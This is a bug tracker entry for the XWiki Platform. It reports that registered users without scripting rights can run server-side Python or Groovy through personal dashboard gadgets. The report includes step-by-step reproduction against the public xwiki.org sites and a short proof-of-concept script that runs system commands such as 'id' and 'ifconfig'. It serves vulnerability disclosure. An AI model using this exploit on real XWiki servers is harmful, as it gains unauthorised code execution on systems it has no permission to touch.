Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-16960

Authenticated server side code execution without programming rights

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Critical
    • Resolution: Duplicate
    • Affects Version/s: 7.2, 8.4.4, 11.10.2
    • Fix Version/s: None
    • Component/s: Dashboard
    • Development Priority:
      High
    • Difficulty:
      Unknown
    • Similar issues:

      Description

      Registered users without scripting/programming permissions are able to execute python/groovy scripts while editing personal dashboards.

      Full path to reproduce:

      1) Create new user on xwiki.org (or myxwiki.org)
      2) Go to profile -> Edit -> My dashboard -> Add gadget
      3) Choose either python or groovy.
      4) Paste following python/groovy code (for unix powered xwiki)

      import os
      print(os.popen("id").read())
      print(os.popen("hostname").read())
      print(os.popen("ifconfig").read())
      r = Runtime.getRuntime()
      proc = r.exec('id');
      BufferedReader stdInput1 = new BufferedReader(new InputStreamReader(proc.getInputStream()));
      String s1 = null;
      while ((s1 = stdInput1.readLine()) != null) { print s1; }
      

      5) Submit the gadget

      Expected behaviour:

      -User is unable to execute server side code due to lack of permissions

      Current behaviour:

      -User can execute server side code as seen on a screenshots.

      This issue affects all versions of xwiki that have personal dashboard feature. 

        Attachments

        1. myxwiki_org_rce.jpg
          326 kB
          Gorban Aleksei
        2. xwiki_org_rce.jpg
          78 kB
          Gorban Aleksei

          Activity

            People

            • Assignee:
              surli Simon Urli
              Reporter:
              gorbanalex Gorban Aleksei
            • Votes:
              0 Vote for this issue
              Watchers:
              3 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved:
                Date of First Response: